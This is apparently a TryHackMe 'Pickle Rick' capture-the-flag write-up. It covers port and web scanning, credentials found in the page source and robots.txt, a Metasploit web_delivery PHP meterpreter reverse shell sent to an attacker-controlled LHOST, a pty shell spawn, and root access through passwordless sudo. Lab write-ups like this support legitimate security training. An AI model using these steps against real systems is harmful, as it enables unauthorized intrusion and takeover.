Pickle Rick - TryHackMe

This challenge, inspired by the world of Rick and Morty, tasks you with exploiting a web server to discover three essential components. These components are essential for Rick's quest to concoct a potion that will reverse his transformation from a pickle and return him to his human form.

PORT ENUMERATION

The command nmap -A -Pn -T4 10.10.127.250 is utilized to conduct an aggressive network scan on the specified target IP address, in this case, 10.10.127.250. It employs advanced scanning techniques with the -A flag, including OS detection, version detection, and script scanning, while bypassing host discovery with -Pn. The -T4 flag sets a moderately fast timing template. This command's primary objective is to comprehensively gather information about the target system's open ports, services, and potentially identify its operating system and software versions for network reconnaissance purposes.

SOURCE CODE ANALYSIS

After executing the nmap command and conducting the network scan, I proceeded to further investigate the target by opening the associated website. Upon inspecting the website's source code, I discovered a username embedded within it, specifically "R1ckRul3s." This username may potentially be relevant for further penetration testing or authentication attempts, suggesting its importance in the context of the target system's security or access control.

ROBOTS.TXT

While examining the website at https://10.10.127.250, I also checked its "robots.txt" file, and within this file, I came across the text "Wubbalubbadubdub." This discovery hints that "Wubbalubbadubdub" might be a password of significance, potentially offering an entry point or access to certain parts of the website or the target system. Further investigation and testing may be necessary to determine the exact context and utility of this password.

NIKTO WEB VULNERABILITY SCANNER

By executing nikto -h "https://10.10.127.250" -C all, you are conducting a thorough web vulnerability assessment of the specified web address. During this scan, Nikto identified a potentially important finding, which is the presence of "/login.php" on the target web server. This discovery suggests the existence of a login page or functionality on the web application, which could be significant for further analysis and potential exploitation testing. The scan aims to comprehensively identify and report potential security weaknesses or vulnerabilities in the target web server and its associated web applications, allowing you to assess the overall security posture and take necessary actions to mitigate any identified risks.

LOGIN PAGE

Upon successfully logging in to the portal at https://10.10.127.250/portal.php using the previously discovered credentials (username: R1ckRul3s and password: Wubbalubbadubdub), you have gained access to a critical interface. This portal serves as a pivotal point for further interaction with the target system, enabling the execution of commands.

METASPLOIT FRAMEWORK - METERPRETER SESSION

sudo msfconsole | search web delivery | use exploit/multi/script/web_delivery | set target 1 | set payload php/meterpreter/reverse_tcp | set lhost 10.2.51.43 | exploit | Copy paste the payload on the portal page | Meterpreter session

In this sequence of commands, we utilize the Metasploit Framework to generate a web-based payload configured for a PHP-based Meterpreter reverse TCP session. After setting the necessary parameters such as the local host and payload type, the exploit is executed. The resulting payload code is then copied and pasted into the portal page, with the intent of exploiting any potential vulnerabilities in the target system. Upon successful execution, a Meterpreter session is established, granting you interactive control over the compromised system.

FIRST INGREDIENT

SECOND INGREDIENT

After gaining access to the compromised system through the Meterpreter session, we have applied a Python command python3 -c 'import pty; pty.spawn("/bin/bash")' to improve our interaction with the target. This command spawns a more functional shell, which enhances your control over the system. Subsequently, we've used the cat * command to read the contents of files, likely in pursuit of the second flag within the system.

PRIVILEGE ESCALATION ANG GETTING THE FINAL FLAG

In the final stages of your operation, you've identified that your current user has elevated privileges, as indicated by the sudo -l command revealing that it has unrestricted sudo access ((ALL) NOPASSWD: ALL). This allows you to execute commands as a superuser without requiring a password prompt. You've subsequently executed sudo su to switch to the root user. Upon gaining root access, you navigated to the /root directory using cd /root and accessed the file 3rd.txt using cat 3rd.txt, successfully obtaining the third and final flag. This sequence of actions showcases your privilege escalation and system traversal skills, culminating in the completion of the Capture The Flag (CTF) challenge.